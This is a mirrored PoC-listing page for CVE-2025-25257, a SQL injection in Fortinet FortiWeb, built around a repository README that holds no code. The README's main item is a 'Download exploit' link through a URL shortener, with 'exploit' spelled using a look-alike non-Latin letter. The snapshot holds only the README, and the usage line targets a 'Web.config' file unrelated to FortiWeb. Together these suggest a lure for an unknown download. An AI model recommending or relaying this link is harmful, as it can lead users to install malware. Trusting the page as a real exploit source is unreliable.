Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-25257 PoC — Fortinet FortiWeb SQL注入漏洞

Source
https://github.com/silentexploitexe/CVE-2025-25257
Associated Vulnerability
Title:Fortinet FortiWeb SQL注入漏洞 (CVE-2025-25257)
Description:Fortinet FortiWeb是美国飞塔(Fortinet)公司的一款Web应用层防火墙,它能够阻断如跨站点脚本、SQL注入、Cookie中毒、schema中毒等攻击的威胁,保证Web应用程序的安全性并保护敏感的数据库内容。 Fortinet FortiWeb 7.6.3及之前版本、7.4.7及之前版本、7.2.10及之前版本和7.0.10之前版本存在SQL注入漏洞,该漏洞源于对SQL命令中特殊元素中和不当,可能导致SQL注入攻击。
Readme
# CVE-2025-25257 SQL Injection Vulnerability in Fortinet FortiWeb Product

### Overview
The vulnerability arises from an inadequate handling of special characters within SQL commands, allowing unauthenticated attackers to execute malicious SQL code through specially crafted HTTP or HTTPS requests. This opens the door for unauthorized manipulation of database interactions, which can compromise data security and application functionality.

### Published Date
17 July 2025

### Key Points

- **Severity**: Critical
- **CVSS Score**: 9.6 (High)
- **Confidentiality**: High
- **Integrity**: High
- **Availability**: High
- **Attack Vector**: Network
- **Attack Complexity**: Low

### [Download explоit here](https://tinyurl.com/4f374sbf)

### Requirements
- Python 3.8+
- Libraries: requests, argparse (install via `pip install -r requirements.txt`)

### Usage
- Install dependencies: `pip install -r requirements.txt`
- Run the explоit: `python explоit.py --target <target_url> --file "/path/to/Web.config"`


### Potencial impact
- **Data Breach**: Exploiting this vulnerability can allow attackers to gain unauthorized access to sensitive information stored in databases. This may lead to severe data leaks or the theft of personally identifiable information (PII), intellectual property, or corporate secrets.

- **System Compromise**: An attacker successfully leveraging this vulnerability could manipulate the application's backend, potentially altering database records, deploying malware, or leading to further system-level vulnerabilities that could compromise the overall security posture of the affected organization.

- **Service Disruption**: The execution of unauthorized SQL commands could result in application downtime or degradation of service performance. Such disruptions can affect user accessibility, leading to a loss of trust among clients and damage to the organization’s reputation.


### Ethical Use Warning
- This script is a proof-of-concept for CVE-2025-25257 for educational and authorized security testing purposes.
- **Do not use this script on systems without explicit permission from the system owner.**
- Misuse may violate laws, including the Computer Fraud and Abuse Act (CFAA) in the United States or similar laws elsewhere.
- Always obtain written consent before testing any system.
File Snapshot

 [4.0K]  /data/pocs/f976735fd0934542c6d4aa3cad94ffdf6f3dfcb9
└── [2.3K]  README.md

1 directory, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.